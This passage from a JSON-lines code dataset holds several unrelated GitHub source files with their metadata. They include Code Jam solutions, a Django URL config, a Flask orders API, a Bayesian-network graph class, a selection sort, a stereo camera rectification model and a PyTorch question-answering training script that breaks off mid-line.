combined_reversed_number = int(combined_reversed_string)\r\n\r\n if user_input == combined_reversed_number:\r\n print('The given number is a Palindrome ')\r\n else:\r\n print('The given number is not a Palindrome')\r\n break\r\n except ValueError:\r\n print(\"Exception : Negative or Alphanumeric entered \\n\")\r\nprint('\\n')\r\n######################################################################################################################################\r\n","repo_name":"alvayash/Edureka_Assignments_Python_Programming_Certification_Training-","sub_path":"Assignment_Module_1_Introduction_to_Python.py","file_name":"Assignment_Module_1_Introduction_to_Python.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"18867594405","text":"from django.urls import path\n\nfrom .views import (\n CourseListAPIView,\n CourseDetailAPIView,\n MajorCodeListAPIView,\n)\n\napp_name = 'course_api'\n\nurlpatterns = [\n path('courses/', CourseListAPIView.as_view(), name='list_api'),\n path('detail/', CourseDetailAPIView.as_view(), name='list_detail'),\n path('major-codes', MajorCodeListAPIView.as_view(), 
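The digit test in Question 3 above can be spot-checked against a one-liner using all(); both produce the same comma-separated sequence:

evens = [n for n in range(1000, 3001)
         if all(int(d) % 2 == 0 for d in str(n))]
print(','.join(map(str, evens)))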
name='major_code_list_api'),\n]\n","repo_name":"ITUscheduler/ITUscheduler","sub_path":"ituscheduler/api/rest_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"23583836901","text":"from sys import argv\nimport math\n\nINPUT_FILE = argv[1]\nOUTPUT_FILE = argv[2]\n\ndef oscillate(l):\n splitting = int(math.ceil(len(l)/2))\n first_half = l[:splitting]\n second_half = l[splitting:]\n new_results = [False]*total\n for i,n in enumerate(first_half):\n new_results[2*i] = n\n for i,n in enumerate(second_half):\n new_results[2*i+1] = n\n return new_results\n\nwith open(INPUT_FILE) as f1:\n with open(OUTPUT_FILE,'w') as f2:\n current = f1.readline()\n current = f1.readline()[:-1]\n case = 1\n while current!='':\n totals = {}\n total,r,o,y,g,b,v = [int(q) for q in current.split(' ')]\n totals['R'] = r\n totals['O'] = o\n totals['Y'] = y\n totals['G'] = g\n totals['B'] = b\n totals['V'] = v\n if max(r,y,b)>total/2:\n answer = 'IMPOSSIBLE'\n else:\n stringed = []\n for k in sorted(totals.keys(),key=lambda x:-totals[x]):\n for n in range(totals[k]):\n stringed.append(k)\n assignments = oscillate(stringed)\n answer = ''.join(assignments)\n f2.write('Case #%d: %s\\n'%(case,answer))\n case += 1\n current = f1.readline()[:-1]\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_207/616.py","file_name":"616.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23568891261","text":"with open(\"input.txt\",\"r\") as file:\n\tlines=file.read().splitlines()\nline_n=0\noutlines=[]\nt=int(lines[line_n])\nline_n=line_n+1\nfor i in range(t):\n\tn,k=map(int,lines[line_n].split(\" \"))\n\tline_n=line_n+1\n\tfilled=[0,n+1]\n\tfor j in range(k):\n\t\tgap=-1\n\t\tpos=-1\n\t\tfor l in xrange(len(filled)-1,0,-1):\n\t\t\tif(filled[l]-filled[l-1]-1>gap):\n\t\t\t\tgap=filled[l]-filled[l-1]-1\n\t\t\t\tpos=l-1\n\t\tmid = (filled[pos+1]+filled[pos])/2\n\t\tif(j==k-1):\n\t\t\ta = mid-filled[pos]-1\n\t\t\tb = filled[pos+1]-mid-1\n\t\t\tif(a>b):\n\t\t\t\toutlines.append(\"Case #\"+str(i+1)+\": \"+str(a)+\" \"+str(b))\n\t\t\telse:\n\t\t\t\toutlines.append(\"Case #\"+str(i+1)+\": \"+str(b)+\" \"+str(a)) \n\t\t\tbreak\n\t\tfilled.append(mid)\n\t\tfilled.sort()\nwith open(\"output.txt\",\"w\") as file:\n\tfor line in outlines:\n\t\tfile.write(line+\"\\n\")","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/1956.py","file_name":"1956.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23565461511","text":"import sys\n\ndef readFile(filename):\n\tL = []\n\twith open(filename, 'r') as fp:\n\t\tT = int(fp.readline())\n\t\tfor i in range(T):\n\t\t\tL.append(fp.readline().strip())\n\treturn T, L\t\n\ndef solve(S):\n\tif len(S) == 1:\n\t\treturn S[0]\n\tS = [int(s) for s in S]\n\tn = len(S)\n\twhile True:\n\t\tflag = False\n\t\tfor i in range(n-1):\n\t\t\tif S[i] > S[i+1]:\n\t\t\t\tflag = True\n\t\t\t\tbreak;\n\t\tif flag:\n\t\t\tS[i] = S[i]-1\n\t\t\tif S[i] < 0:\n\t\t\t\tS[i] = 9\n\t\t\tfor j in range(i+1, n):\n\t\t\t\tS[j] = 9\n\t\telse:\n\t\t\tbreak\n\toutput = ''.join([str(s) for s in S])\n\ti = 0\n\twhile i < len(S) and output[i] == '0':\n\t\ti += 1\n\toutput = output[i:]\n\treturn output\n\nif __name__ == \"__main__\":\n\tinput_filename = 
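oscillate() in the Code Jam record above interleaves the two halves of a sorted color list but reads a global total for the output length; a parameterized rewrite makes the behavior easy to check:

import math

def oscillate(l, total):
    # Split in half (first half longer when odd), then interleave.
    splitting = int(math.ceil(len(l) / 2))
    first, second = l[:splitting], l[splitting:]
    out = [False] * total
    for i, n in enumerate(first):
        out[2 * i] = n
    for i, n in enumerate(second):
        out[2 * i + 1] = n
    return out

print(oscillate(['B', 'B', 'R', 'Y'], 4))   # ['B', 'R', 'B', 'Y'] -- no adjacent repeats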
sys.argv[1]\n\tT, L = readFile(input_filename)\n\toutput_fp = open('output.txt', 'w')\n\tfor i in range(T):\n\t\tresult = \"Case #{}: {}\".format(i+1, solve(L[i]))\n\t\toutput_fp.write(result)\n\t\tif not i==T-1:\n\t\t\toutput_fp.write('\\n')\n\t\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/809.py","file_name":"809.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72815308674","text":"import django_filters\nfrom django import forms\nfrom .models import Traffic\n\nclass TrafficFilter(django_filters.FilterSet):\n fulltext = django_filters.CharFilter(lookup_expr='icontains')\n class Meta:\n model = Traffic\n fields = {'PIR', 'status', 'fulltext','user'}\n help_texts={\n 'fulltext': None,\n 'PIR': None,\n 'status': None,\n 'user': None,\n }\n labels = {\n 'PIR': ('Filter by PIR'),\n 'status': ('Filter by status'),\n 'fulltext': ('Filter from traffic text'),\n 'tags' : ('Filter by tags'),\n }\n widgets = {\n 'PIR': forms.TextInput(attrs={'placeholder': 'Filter by PIR'}),\n }\n ","repo_name":"ecuadrafoy/4cent","sub_path":"logger/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74959833475","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# @file pinhole.py\n# @brief\n# @author QRS\n# @version 1.0\n# @date 2023-01-09 21:46\n\nimport cv2\nimport numpy as np\n\n\nclass PinHoleModel(object):\n '''\n\n '''\n\n def __init__(self, lazy=False):\n if lazy:\n # stereoRectify(\n # cameraMatrix1, distCoeffs1, cameraMatrix2, distCoeffs2, imageSize,\n # R, T[, R1[, R2[, P1[, P2[, Q[, flags[, alpha[, newImageSize]]]]]]]])\n # -> R1, R2, P1, P2, Q, validPixROI1, validPixROI2\n # also do: R1, R2, P1, P2, Q, *_ = cv2.stereoRectify()\n self.stereo_rectify = lambda *argv, **kwargs: cv2.stereoRectify(*argv, **kwargs)[:5]\n\n def stereo_rectify(\n self,\n camera_matrix1, dist_coeffs1,\n camera_matrix2, dist_coeffs2,\n image_size, R, T, flags,\n newImageSize=None, balance=None, fov_scale=None):\n\n '''\n Args:\n R 两个相机坐标系统的旋转矩阵(2 to 1)\n T 两个相机坐标系统的平移矩阵(2 to 1)\n Returns:\n R1: 第1个相机校正旋转矩阵(3x3)\n R2: 第2个相机校正旋转矩阵(3x3)\n P1: 第1个相机校正投影矩阵(3x4)\n P2: 第2个相机校正投影矩阵(3x4)\n Q: 重投影矩阵(4x4)\n '''\n\n # https://zhuanlan.zhihu.com/p/348846552\n # 平移向量/旋转角度向量\n tvec = T.astype(np.float64).reshape((3, 1))\n rvec, _ = cv2.Rodrigues(R.astype(np.float64)) # 模表示旋转角度\n\n rvec *= -0.5 # 旋转左右相机使它们的基坐标系平行(但不一定共面)\n r_r, _ = cv2.Rodrigues(rvec)\n\n t = r_r @ tvec # 重新计算新基下的平移向量\n uu = np.array([1 if t[0, 0] > 0 else -1, 0, 0]).reshape((3, 1))\n\n # ^ e3 叉乘得到垂直e1,e2平面的法向量\n # │\n # │ ^ 相机2平分后的平移向量(t)\n # ───────┼───────────/ e2\n # ╱ │ ╱\n # ╱ │ ╱\n # ╱ ╱ theta\n # ╱─────────────────────> e1 相机1坐标系(1,0,0)\n ww = np.cross(t, uu, axis=0)\n nw = np.linalg.norm(ww)\n if nw > 0.0:\n # 左右相机各自旋转, 将原左(右)相机的X轴于平移向量t重合, 即绕这两个向量的法向量旋转\n # 通过每一角度对应的模长计算旋转角度\n # 模表示旋转角度\n ww *= np.arccos(np.abs(t[0]) / np.linalg.norm(t)) / nw\n\n wr, _ = cv2.Rodrigues(ww)\n\n # 同行\n ri1 = wr @ r_r.T\n R1 = ri1.astype(np.float64)\n ri2 = wr @ r_r\n R2 = ri2.astype(np.float64)\n tnew = ri2 @ tvec\n\n balance = min(max(balance, 0), 1) if balance is not None else 0.0\n\n def _calculate_projection(K, D, R): # {{{\n w, h = image_size\n\n _points = np.expand_dims(np.array(\n [[w / 2, 0],\n [w, h / 2],\n [w / 2, h],\n [0, h / 2]], dtype=np.float64), 1)\n\n points = 
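solve() in the tidy-number record above repeatedly decrements the first digit that breaks non-decreasing order and fills the tail with 9s, then strips leading zeros. Assuming that function is in scope, a few spot checks:

assert solve('132') == '129'
assert solve('1000') == '999'
assert solve('111111111111111110') == '99999999999999999'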
np.squeeze(self.undistort_points(_points, K, D, R=R))\n cn = np.mean(points, axis=0).flatten()\n\n aspect_ratio = K[0, 0] / K[1, 1]\n\n cn[1] *= aspect_ratio\n points[:, 1] *= aspect_ratio\n\n minx = points[:, 0].min()\n maxx = points[:, 0].max()\n miny = points[:, 1].min()\n maxy = points[:, 1].max()\n\n f1 = w * 0.5 / (cn[0] - minx)\n f2 = w * 0.5 / (maxx - cn[0])\n f3 = h * 0.5 * aspect_ratio / (cn[1] - miny)\n f4 = h * 0.5 * aspect_ratio / (maxy - cn[1])\n\n fmin = min(f1, min(f2, min(f3, f4)))\n fmax = max(f1, max(f2, max(f3, f4)))\n\n f = balance * fmin + (1.0 - balance) * fmax\n\n f *= 1.0 / fov_scale if fov_scale is not None and fov_scale > 0 else 1.0\n\n new_f = np.array((f, f))\n new_c = -cn * f + np.array((w, h * aspect_ratio)) * 0.5\n\n new_f[1] /= aspect_ratio\n new_c[1] /= aspect_ratio\n\n if newImageSize is not None:\n rx = newImageSize[0] / image_size[0]\n ry = newImageSize[1] / image_size[1]\n\n new_f[0] *= rx\n new_f[1] *= ry\n new_c[0] *= rx\n new_c[1] *= ry\n\n P = np.array([[new_f[0], 0, new_c[0]],\n [0, new_f[1], new_c[1]],\n [0, 0, 1]])\n return P # }}}\n\n new_k1 = _calculate_projection(camera_matrix1, dist_coeffs1, R1)\n new_k2 = _calculate_projection(camera_matrix2, dist_coeffs2, R2)\n\n fc_new = min(new_k1[1, 1], new_k2[1, 1])\n cc_new = np.array([[new_k1[0, 2], new_k1[1, 2]], [new_k2[0, 2], new_k2[1, 2]]])\n\n if flags & cv2.CALIB_ZERO_DISPARITY == cv2.CALIB_ZERO_DISPARITY:\n cc_new[0, :] = (cc_new[0, :] + cc_new[1, :]) * 0.5\n cc_new[1, :] = cc_new[0, :]\n else:\n cc_new[0, 1] = (cc_new[0, 1] + cc_new[1, 1]) * 0.5\n cc_new[1, 1] = cc_new[0, 1]\n\n P1 = np.array([[fc_new, 0, cc_new[0, 0], 0],\n [0, fc_new, cc_new[0, 1], 0],\n [0, 0, 1, 0]], dtype=np.float64)\n\n P2 = np.array([[fc_new, 0, cc_new[1, 0], tnew[0][0] * fc_new], # baseline * focal length;,\n [0, fc_new, cc_new[1, 1], 0],\n [0, 0, 1, 0]], dtype=np.float64)\n\n Q = np.array([[1, 0, 0, -cc_new[0, 0]],\n [0, 1, 0, -cc_new[0, 1]],\n [0, 0, 0, fc_new],\n [0, 0, -1. 
/ tnew[0][0], (cc_new[0, 0] - cc_new[1, 0]) / tnew[0][0]]], dtype=np.float64)\n\n return R1, R2, P1, P2, Q\n\n def undistort_rectify_map(self, camera_matrix, dist_coeffs, R, new_camera_matrix, image_size, m1type):\n return cv2.initUndistortRectifyMap(\n camera_matrix,\n dist_coeffs, R,\n new_camera_matrix,\n image_size, m1type)\n\n def undistort_points(self, points, camera_matrix, dist_coeffs, R=None, P=None):\n return cv2.undistortPoints(points, camera_matrix, dist_coeffs, R=R, P=P)\n\n\nclass PinHoleRadTanModel(PinHoleModel):\n pass\n","repo_name":"qrsforever/vision-mcs","sub_path":"app/vmcs/core/camera/models/pinhole.py","file_name":"pinhole.py","file_ext":"py","file_size_in_byte":6452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23601730781","text":"'''\r\nCreated on May 8, 2010\r\n\r\n@author: qfel13\r\n'''\r\n\r\nif __name__ == '__main__':\r\n\tsol = {}\r\n\tstep = {}\r\n\tfor i in xrange(1, 31):\r\n\t\tsol[i] = 0\r\n\t\tstep[i] = 2**i\r\n\t\tfor j in xrange(i):\r\n\t\t\tsol[i] += 2**j\r\n\t\r\n\tf = open(\"A-large.in\", \"r\")\r\n\tfout = open(\"A-large.out\", \"w\")\r\n\tcaseCount = int(f.readline())\r\n\tfor case in xrange(caseCount):\r\n\t\ta = f.readline().split(\" \", 1)\r\n\t\tn = int (a[0])\r\n\t\tk = int (a[1])\r\n\t\t\r\n\t\tfout.write(\"Case #\" + str(case + 1) + \": \")\r\n\t\tif (k%step[n]) == sol[n]:\r\n\t\t\tfout.write(\"ON\\n\")\r\n\t\telse:\r\n\t\t\tfout.write(\"OFF\\n\")","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_53/727.py","file_name":"727.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12737151595","text":"#!/usr/bin/python3\n\"\"\" Objects that handle all default RestFul API actions for orders \"\"\"\nfrom models.order import Order\nfrom models.food import Food\nfrom models.drink import Drink\nfrom models.store import Store\nfrom models import storage\nfrom api.v1.views import app_views\nfrom flask import abort, jsonify, make_response, request\n\n@app_views.route('/stores/<store_id>/orders', methods=['GET'],\n strict_slashes=False)\ndef get_orderids(store_id):\n \"\"\"\n Retrieves the list of all Order objects\n of a specific Store\n \"\"\"\n list_orders = []\n store = storage.get(Store, store_id)\n if not store:\n abort(404)\n for order in store.orders:\n list_orders.append(order.to_dict())\n\n return jsonify(list_orders)\n\n@app_views.route('/orders/<order_id>/', methods=['GET'], strict_slashes=False)\ndef get_orders(order_id):\n \"\"\"\n Retrieves a specific order based on id\n \"\"\"\n order = storage.get(Order, order_id)\n if not order:\n abort(404)\n return jsonify(order.to_dict())\n\n\n@app_views.route('/orders/<order_id>', methods=['DELETE'], strict_slashes=False)\ndef delete_order(order_id):\n \"\"\"\n Deletes an order based on id provided\n \"\"\"\n order = storage.get(Order, order_id)\n\n if not order:\n abort(404)\n storage.delete(order)\n storage.save()\n\n return make_response(jsonify({}), 200)\n\n\n@app_views.route('/stores/<store_id>/orders', methods=['POST'],\n strict_slashes=False)\ndef post_order(store_id):\n \"\"\"\n Creates an Order to a Store\n \"\"\"\n store = storage.get(Store, store_id)\n if not store:\n abort(404)\n\n if not request.get_json():\n abort(400, description=\"Not a JSON\")\n data = request.get_json()\n\n if 'order_number' not in request.get_json():\n abort(400, description=\"Missing order number\")\n if 'user_name' not in
request.get_json():\n abort(400, description=\"Missing user name\")\n\n data['store_id'] = store_id\n instance = Order(**data)\n instance.save()\n return make_response(jsonify(instance.to_dict()), 201)\n\n\n@app_views.route('/orders/<order_id>', methods=['PUT'], strict_slashes=False)\ndef put_order(order_id):\n \"\"\"\n Updates an Order\n \"\"\"\n order = storage.get(Order, order_id)\n if not order:\n abort(404)\n\n if not request.get_json():\n abort(400, description=\"Not a JSON\")\n\n ignore = ['id', 'store_id', 'created_at', 'updated_at']\n\n data = request.get_json()\n for key, value in data.items():\n if key not in ignore:\n setattr(order, key, value)\n storage.save()\n return make_response(jsonify(order.to_dict()), 200)\n","repo_name":"ffelipegupe/fastq","sub_path":"api/v1/views/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31943587561","text":"from collections import defaultdict\nfrom copy import deepcopy\n\nfrom pybbn.graph.edge import EdgeType\n\n\nclass Graph(object):\n \"\"\"\n Graph.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Ctor.\n \"\"\"\n self.nodes = dict()\n self.edges = dict()\n self.edge_map = defaultdict(set)\n self.neighbors = defaultdict(set)\n\n def get_neighbors(self, id):\n \"\"\"\n Gets the neighbors of the specified node.\n\n :param id: Node id.\n :return: Set of neighbors of the specified node.\n \"\"\"\n return self.neighbors[id]\n\n def get_node(self, id):\n \"\"\"\n Gets the node associated with the specified id.\n\n :param id: Node id.\n :return: Node.\n \"\"\"\n return self.nodes[id]\n\n def get_nodes(self):\n \"\"\"\n Gets all the nodes.\n\n :return: List of nodes.\n \"\"\"\n return self.nodes.values()\n\n def get_edges(self):\n \"\"\"\n Gets all the edges.\n\n :return: List of edges.\n \"\"\"\n return [edge for edge in self.edges.values()]\n\n def add_node(self, node):\n \"\"\"\n Adds a node.\n\n :param node: Node.\n :return: This graph.\n \"\"\"\n if node.id not in self.nodes:\n self.nodes[node.id] = node\n return self\n\n def add_edge(self, edge):\n \"\"\"\n Adds an edge.\n\n :param edge: Edge.\n :return: This graph.\n \"\"\"\n self.add_node(edge.i)\n self.add_node(edge.j)\n\n if self.__shouldadd__(edge):\n self.edges[edge.key] = edge\n self.edge_map[edge.i.id].add(edge.j.id)\n if EdgeType.UNDIRECTED == edge.type:\n self.edge_map[edge.j.id].add(edge.i.id)\n\n self.neighbors[edge.i.id].add(edge.j.id)\n self.neighbors[edge.j.id].add(edge.i.id)\n\n self.__edge_added__(edge)\n\n return self\n\n def __edge_added__(self, edge):\n \"\"\"\n Callback listener for sub-classes when an edge has been added.\n\n :param edge: Edge.\n :return: None.\n \"\"\"\n pass\n\n def __shouldadd__(self, edge):\n \"\"\"\n Checks if the specified edge should be added.\n\n :param edge: Edge.\n :return: A boolean indicating if the edge should be added.\n \"\"\"\n lhs = edge.i\n rhs = edge.j\n\n if lhs.id == rhs.id:\n return False\n\n if EdgeType.UNDIRECTED == edge.type:\n if lhs.id not in self.edge_map[rhs.id] or rhs.id not in self.edge_map[lhs.id]:\n return True\n else:\n if rhs.id not in self.edge_map[lhs.id]:\n return True\n\n return False\n\n def edge_exists(self, id1, id2):\n \"\"\"\n Checks if the specified edge id1 -- id2 exists.\n\n :param id1: Node id.\n :param id2: Node id.\n :return: A boolean indicating if the specified edge exists.\n \"\"\"\n if id1 in self.edge_map and id2 in self.edge_map[id1]:\n return True\n if id2 in self.edge_map and id1
in self.edge_map[id2]:\n return True\n return False\n\n def remove_node(self, id):\n \"\"\"\n Removes a node from the graph.\n\n :param id: Node id.\n \"\"\"\n self.nodes.pop(id, None)\n self.edge_map.pop(id, None)\n self.neighbors.pop(id, None)\n\n for k, v in self.edge_map.items():\n if id in v:\n v.remove(id)\n\n for k, v in self.neighbors.items():\n if id in v:\n v.remove(id)\n\n def __str__(self):\n nodes = str.join('\\n', [x.__str__() for x in self.nodes.values()])\n edges = str.join('\\n', [x.__str__() for x in self.edges.values()])\n return nodes + '\\n' + edges\n\n def __copy__(self):\n cls = self.__class__\n result = cls.__new__(cls)\n result.__dict__.update(self.__dict__)\n return result\n\n def __deepcopy__(self, memodict={}):\n cls = self.__class__\n result = cls.__new__(cls)\n memodict[id(self)] = result\n for k, v in self.__dict__.items():\n setattr(result, k, deepcopy(v, memodict))\n return result\n\n\nclass Ug(Graph):\n \"\"\"\n Undirected graph.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Ctor.\n \"\"\"\n Graph.__init__(self)\n","repo_name":"vangj/py-bbn","sub_path":"pybbn/graph/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"61"} +{"seq_id":"14014928488","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nselection sort\n~~~~~~~~~~~~~~~~~~~~~~\n\n1. Find the smallest (or largest) element in the unsorted sequence and place it at the start of the sorted sequence.\n2. Keep finding the smallest (or largest) element among the remaining unsorted elements and append it to the end of the sorted sequence.\n3. Repeat until all elements are sorted.\n\n\"\"\"\n\ndef select_sort(arry):\n n = len(arry)\n for i in range(0, n):\n min = i # index of the current minimum element\n for j in range(i+1, n):\n if arry[j] < arry[min]:\n min = j # found a smaller value, record its index\n arry[min], arry[i] = arry[i], arry[min]\n return arry\n\n\n# example\nb = [x for x in range(1000)] # array from 0 to 999\nimport random\nrandom.shuffle(b) # randomly shuffle\nselect_sort(b)\n\n# timer\nimport time\ntic = time.time()\nselect_sort(b)\ntoc = time.time() - tic\nprint(toc)\n","repo_name":"randi219/learnPython","sub_path":"sorting/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26759857969","text":"import json\r\nimport torch\r\nimport numpy as np\r\nimport random\r\nimport warnings\r\nfrom tqdm import tqdm\r\nfrom torch.utils.data import DataLoader, RandomSampler, SequentialSampler\r\nfrom transformers import BertTokenizerFast, ElectraTokenizerFast\r\nfrom transformers import BertConfig, ElectraConfig\r\nfrom transformers import AdamW, get_linear_schedule_with_warmup\r\nfrom utils.evaluate_v2 import main as evaluate_on_squad, EVAL_OPTS\r\n\r\nfrom utils.config import *\r\n\r\nfrom models.ours import LIMN\r\nfrom models.baseline import baseline, SUP\r\n\r\nfrom utils.utils_split import get_dataset, collate_fn\r\n\r\n# if using BERT-base, change the utils\r\n# from utils.random_utils_split import get_dataset, collate_fn\r\n\r\nMRC_MODEL_LIST = [baseline, SUP, LIMN]\r\n\r\nMODEL_CLASSES = {\r\n 'bert': (BertConfig, BertTokenizerFast),\r\n 'electra': (ElectraConfig, ElectraTokenizerFast)\r\n}\r\n\r\nwarnings.filterwarnings(\"ignore\")\r\ndevice = torch.device(\"cuda:\" + str(args.cuda)) if USE_CUDA else torch.device(\"cpu\")\r\ntrain_path = os.path.join(args.data_path, \"FriendsQA/friendsqa_trn.json\")\r\neval_path = os.path.join(args.data_path, \"FriendsQA/friendsqa_dev.json\")\r\ntest_path = os.path.join(args.data_path, \"FriendsQA/friendsqa_tst.json\")\r\nconfig_class,
tokenizer_class = MODEL_CLASSES[args.model_type]\r\n\r\nMRC_NAME = ['_baseline_', '_SUP_', '_LIMN_']\r\n\r\nmodel_save_path = \"./saves/checkpoint/\" + args.model_type + MRC_NAME[args.model_num] + \"FriendsQA_\" + str(\r\n args.learning_rate) + \"_T\" + str(args.ts_num) + \"_M\" + str(args.mha_layer_num) + '.pkl'\r\n\r\nresult_json = \"./saves/result/\" + args.model_type + MRC_NAME[args.model_num] + \"FriendsQA_\" + str(\r\n args.learning_rate) + \"_T\" + str(args.ts_num) + \"_M\" + str(args.mha_layer_num) + '.json'\r\n\r\npretrained_model_path = \"./saves/checkpoint/\" + args.model_type + \"_SQuAD_\" + str(6e-06) + \"_T\" + str(\r\n args.ts_num) + '.pkl'\r\n\r\n\r\ndef set_seed():\r\n random.seed(args.seed)\r\n np.random.seed(args.seed)\r\n torch.manual_seed(args.seed)\r\n if USE_CUDA:\r\n torch.cuda.manual_seed(args.seed)\r\n torch.cuda.manual_seed_all(args.seed)\r\n\r\n\r\ndef train(model, train_loader, eval_dataloader, test_dataloader, tokenizer):\r\n save_dev_f1 = 0\r\n save_dev_em = 0\r\n\r\n print(\"Training arguments:\")\r\n print(args)\r\n\r\n patience_turns = 0\r\n model.train()\r\n model.zero_grad()\r\n\r\n # freeze memory encoder\r\n for name, param in model.memory_encoder.named_parameters():\r\n param.requires_grad = False\r\n print(name, param.requires_grad)\r\n print(pretrained_model_path)\r\n\r\n no_decay = ['bias', 'LayerNorm.weight']\r\n optimizer_grouped_parameters = [\r\n {'params': [p for n, p in model.named_parameters() if\r\n (not any(nd in n for nd in no_decay)) and p.requires_grad == True],\r\n 'weight_decay': args.weight_decay},\r\n {'params': [p for n, p in model.named_parameters() if\r\n (any(nd in n for nd in no_decay)) and p.requires_grad == True], 'weight_decay': 0.0}\r\n ]\r\n\r\n all_optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)\r\n t_total = len(train_loader) * args.epochs\r\n num_warmup_steps = int(t_total * args.warmup_proportion)\r\n scheduler = get_linear_schedule_with_warmup(all_optimizer, num_warmup_steps=num_warmup_steps,\r\n num_training_steps=t_total)\r\n logging_step = t_total // (args.epochs * 5)\r\n steps = 0\r\n\r\n for epoch in range(args.epochs):\r\n avg_loss, avg_span_loss, avg_utter_loss, avg_speaker_loss = 0, 0, 0, 0\r\n pbar = tqdm(enumerate(train_loader), total=len(train_loader))\r\n for _, batch in pbar:\r\n # for batch in train_loader:\r\n inputs = {'input_ids': batch['input_ids'],\r\n 'token_type_ids': batch['token_type_ids'],\r\n 'attention_mask': batch['attention_mask'],\r\n 'p_mask': batch['p_mask'],\r\n 'utterance_ids_dict': batch['utterance_ids_dict'],\r\n 'start_pos': batch['start_pos'],\r\n 'end_pos': batch['end_pos']\r\n }\r\n if args.add_speaker_mask:\r\n inputs.update({'speaker_ids_dict': batch['speaker_ids_dict']})\r\n outputs = model(**inputs)\r\n loss = outputs[0]\r\n loss.backward()\r\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\r\n all_optimizer.step()\r\n if t_total is not None:\r\n scheduler.step()\r\n if len(outputs) == 2: # without SUP\r\n span_loss = outputs[1].item()\r\n pbar.set_description(\"Epoch:%d | Loss:%.3f | SL:%.3f\" \\\r\n % (epoch, loss.item(), span_loss))\r\n avg_loss += loss\r\n avg_span_loss += span_loss\r\n elif len(outputs) == 4: # with SUP\r\n span_loss = outputs[1].item()\r\n utter_loss = outputs[2].item()\r\n speaker_loss = outputs[3].item()\r\n pbar.set_description(\"Epoch:%d | Loss:%.3f | SL:%.3f | UL:%.3f | SpeakerL:%.3f\" \\\r\n % (epoch, loss.item(), span_loss, utter_loss, speaker_loss))\r\n avg_loss += loss\r\n
avg_span_loss += span_loss\r\n avg_utter_loss += utter_loss\r\n avg_speaker_loss += speaker_loss\r\n\r\n model.zero_grad()\r\n\r\n # evaluation\r\n #if True:\r\n if steps != 0 and steps % logging_step == 0:\r\n print(\"\\n\" + \"=\" * 10 + \"evaluation\" + \"=\" * 10)\r\n print(\"Epoch {}, Step {}\".format(epoch, steps))\r\n with torch.no_grad():\r\n eval_result = evaluate(model, eval_dataloader, tokenizer, is_test=False)\r\n test_result = evaluate(model, test_dataloader, tokenizer, is_test=True)\r\n print(\"Eval Result:\", eval_result)\r\n print(\"Test Result:\", test_result)\r\n\r\n # save model on dev\r\n if eval_result['em'] + eval_result['f1'] > save_dev_em + save_dev_f1:\r\n save_dev_f1 = eval_result['f1']\r\n save_dev_em = eval_result['em']\r\n torch.save(model.state_dict(), model_save_path)\r\n result = {\"epoch\": epoch, \"test\": test_result, \"dev\": eval_result}\r\n print(\"save model with only dev em: %f, f1: %f\" % (save_dev_em, save_dev_f1))\r\n print(\"test em: %f, f1: %f\" % (test_result['em'], test_result['f1']))\r\n with open(result_json, \"w\") as f:\r\n json.dump(result, f)\r\n\r\n steps += 1\r\n print(\"epoch: \", epoch)\r\n print(\r\n \"\\nAverage Loss:%.3f | SpanLoss:%.3f |\" \\\r\n % (avg_loss / len(train_loader), avg_span_loss / len(train_loader)))\r\n\r\n\r\ndef evaluate(model, eval_loader, tokenizer, is_test=False):\r\n if not os.path.exists(args.save_path):\r\n os.mkdir(args.save_path)\r\n\r\n model.eval()\r\n answer_dict, na_dict = {}, {}\r\n correct_num, all_num = 0, 0\r\n target_file_path = 'data/FriendsQA/' + ('tst' if is_test else 'dev') + '_uids_target.json'\r\n with open(target_file_path, \"r\") as f:\r\n target_uids_dict = json.load(f)\r\n\r\n for batch in eval_loader:\r\n cur_batch_size = len(batch['input_ids'])\r\n\r\n inputs = {'input_ids': batch['input_ids'],\r\n 'token_type_ids': batch['token_type_ids'],\r\n 'attention_mask': batch['attention_mask'],\r\n 'p_mask': batch['p_mask'],\r\n 'context': batch['context'],\r\n 'utterance_ids_dict': batch['utterance_ids_dict'],\r\n 'offset_mapping': batch['offset_mapping'],\r\n 'qid': batch['qid']\r\n }\r\n if args.add_speaker_mask:\r\n inputs.update({'speaker_ids_dict': batch['speaker_ids_dict']})\r\n outputs = model(**inputs)\r\n answer_list = 